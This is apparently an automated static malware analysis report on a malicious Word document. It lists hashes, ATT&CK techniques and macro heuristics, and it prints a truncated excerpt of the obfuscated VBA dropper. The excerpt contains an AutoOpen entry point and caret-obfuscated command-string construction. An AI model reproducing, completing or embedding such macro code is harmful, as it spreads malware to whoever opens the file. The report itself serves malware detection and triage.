Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff227b6daaae1788…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 181.1 KB
Created: 2018-09-25 07:47:00
Authoring application: Microsoft Office Word
First seen: 2019-02-26
MD5: 97f29ca811a4911fc5f094619ec140b4
SHA-1: 7129c85e31028a8891bed15df9184e9a99b24e79
SHA-256: ff227b6daaae178805aeef700a26bd4a5ee14751863753b2ccc24ee640f480bc
Risk score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample triggers the critical OLE_VBA_SHELL heuristic, indicating a Shell() call within the VBA macros. An AutoOpen macro is present, which is a common entry point for malicious VBA code. The script is heavily obfuscated and truncated, but the presence of Shell() strongly suggests it is designed to download and execute a second-stage payload. The legacy WordBasic AutoExec marker also points to older macro execution techniques.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 172448 bytes
SHA-256: bec4e2963624b73d6cef4ddd12898038436c0d3c6aa28d215340503f678cdde7

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "JzlPEAHo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim ZoqAo(2)
ZoqAo(0) = Mid(dfjkWGOL + loRURdmansOEzDUQ + zlbGhdW, 259, 782) + Right(izhjiuH + ONcFOSXjDuvvolOjziYlML + bXSJME, 319)
ZoqAo(1) = MidB(JVsOFqo + liKvdofLKpcPuwIGui + cAtUWVt, 773, 702) + Right(ZBCftdd + FWJubOIJhqzvDivICRWFb + cCRPcQ, 885) + Right(FqwtIM + CKjizjIJVlbhMHlGs + ZDwdc, 99) + MidB(zqhPCRw + ihGTvIVoJlmXGsoffTriWi + uTPPNRGX, 199, 238)
   Dim vcnowA(2)
vcnowA(0) = MidB(jobEhTK + DjlaMbWZYUQihbMGjDiWs + FrLiu, 135, 914) + Left(czDiB + CcUMAHraiGimVNBViOKdN + bzNDC, 28)
vcnowA(1) = Left(ftYjLwsT + AQulPVhjlAGqwfAdXj + zqTUBp, 438) + Left(DRNEHpjG + VdonuSMSrqjfuBvnTrJzGo + mqqQXpLk, 722)
   Dim RatdB(2)
RatdB(0) = Left(UAVAZr + ChjjmPwrzztNfjmkalUE + SUuurLJ, 570) + Mid(ujVjr + CdCjzpUBQHjshdUvEzzopP + mDdZsH, 38, 357)
RatdB(1) = MidB(zTiaLqvC + aRDVPvOCpMTKShqObqOD + BQilJ, 861, 751) + Mid(wVzHK + PPkndIMsTEoSpLNOfkAtw + CWMjPjRi, 525, 981) + MidB(YsElGqow + kHcnwRPWnOifzDYWkOM + vVawuDI, 505, 938) + Right(FDbjAaM + itnOGHmbREYLzqJUSfoh + ZvbpW, 188)
   Dim lJNoJI(2)
lJNoJI(0) = Right(ijPwb + HtJWVSSjbsbqPuVYYdKNIZH + rQfrkVk, 760) + Right(wSScSMQh + jNrptrTwBzOLqodrUfGj + OFArA, 840)
lJNoJI(1) = MidB(OsdZqwsB + nsiGbpQPqnNdjimSEiJF + wLEFCwTq, 981, 870) + Right(HdMCkbB + OwPLTijcincclKM + WinUCX, 158) + Left(uhDCw + oujrkGPBJwAkOJsikI + wwcih, 935) + Right(MtMzQd + PHYSsYHkVSuJSslnsH + SSslHXTI, 723)
   Dim OdkcQ(2)
OdkcQ(0) = Left(GzMipHuu + fpIbqGAAnzwjlADV + UPBAbc, 775) + Mid(qNRPdvA + KicPkrjAzDGjoLaGa + RWQwlhBj, 714, 697)
OdkcQ(1) = Right(LsoEfJr + rZdAphbVuGITMnGbiQLTn + rzGuz, 673) + Right(azmwwz + PqMYsjFrDQQLfpdpbLbwX + lHMrJ, 539) + MidB(wdamULQB + SEDvrzGTzFotpubsAtoML + ODJiKKY, 36, 85) + MidB(qQPkq + uHjlBRpJCBirOiDKf + QslBmDKc, 308, 44)
pmSOaFvRbQ (KeyString(BMcEvE + TCLuoTN + 6 + 3 + 3 + 4 + 51 + iiwNZ + caSuTK) + sVlHOFDB + ZkfvcEbh + KeyString(aEMcJ + UmZTJmX + 7 + 3 + 3 + 5 + 59 + hGPGaj + ASrhwN) + oFJmiQzm + FOwHNkjj + jdlfI + RvKYz + ZRvGzw + MYUDIS + aACjw + PafPBO + bmiiimBGLz + urifcYTXIzT + ksnpVpfZQBv + uPuhtElmz + kwhwTwvqX + AChMsm + wifNuGjH)
   Dim rJzpL(1)
rJzpL(0) = MidB(jLKaF + ouwptRhClpDqorhNtKa + qPDLb, 114, 363) + Left(cZzKuO + JHNAIcRBTtsPsOwiaFGwT + NSfizSh, 884)
End Sub


Attribute VB_Name = "DLinmKEmZ"
Function oFJmiQzm()
XRswEicdG = "d" + " " + CStr(Chr(6 + 3 + 6 + 6 + 26)) + "V^" + ":" + "^" + "O" + CStr(Chr(6 + 3 + 6 + 6 + 26)) + "C" + CStr(Chr(4 + 2 + 4 + 4 + 20)) + "^s" + "^e" + "^t"
uAlkXElHCcz = " " + "?^" + "}" + "^" + "`" + "=^" + "13" + "^0" + "^ "
Dim jAVBIR(2)
jAVBIR(0) = Mid(MJZuaA + FdzWikcdwwmXTRdsjKfZv + DqwHD, 628, 627) + Mid(LXZzvXnX + FrsrdRHWQaEEAYjVtPFci + DfwMWH, 260, 502)
jAVBIR(1) = Mid(LzUqGY + PHSZZOkCSFzPGNRLJtS + jFVnOim, 821, 921) + Right(wEdFhc + vUQDwOcoNAlopUtzp + ODSzmBj, 232) + Right(aNvJTBY + BwdvLShQkofdhPFMbNscjSLj + WSUXpVh, 719) + MidB(jFkvb + wfjEHbwmJVtiLlRR + oMiUE, 593, 323)
   Dim jzYsuw(2)
jzYsuw(0) = Mid(lavkj + DjuOwBLVCCcJbhrYjZItw + TAbjlG, 921, 201) + Right(QtNJBo + XjmdEqsKoFvOYhLGoRw + wQTriPfk, 689)
jzYsuw(1) = MidB(QlqvkX + HEhiSfobikAbCnfnNvJVLK + mrPVRZAZ, 885, 326) + Right(MqopB + zOzKINEAzjWTshZNTaact + VGXGT, 385)
   Dim bjpjHH(1)
bjpjHH(0) = Mid(zbKuRIio + njBXlDFswHtiPKzMCSGG + AiTkMbj, 44, 72) + Right(hDwlkBO + GzvkjqjbzhZVwdVfWXr + iDOzbSQ, 843) + Mid(UDmiDWvH + zFMHNGjjrPOFdcjAi + hcbhiuRJ, 522, 312) + Mid(jYqGlL + IAcGjZdtOHRZJfjhMOaQ + CdjnWu, 791, 439)
EMNmTH = "35" + "0^" + " ^" + "1" + "0" + "3" + " " + "^"
FLZICm = "3^" + "5^" + "1 " + "^" + "3" + "^5"
MOriiPO = "^" + "9" + "^ " + "3" + "^1" + "^0" + " " + "0" + "^1" + "^3" + " ^" + "9" + "^"
ivUcpr = "51" + " " + "5^" + "1" + "^9" + "^" + " "
UBkmFrj = "^1" + "5" + "3^" + " " + "09" + "^5" + "^ " + "9" + "^" + "05"
iUPMdDsUWiw = " " + "9^" + "0" + "1" + " " + "^" + "5" + "1" + "0" + " "
oFJmiQzm = XRs
... (truncated)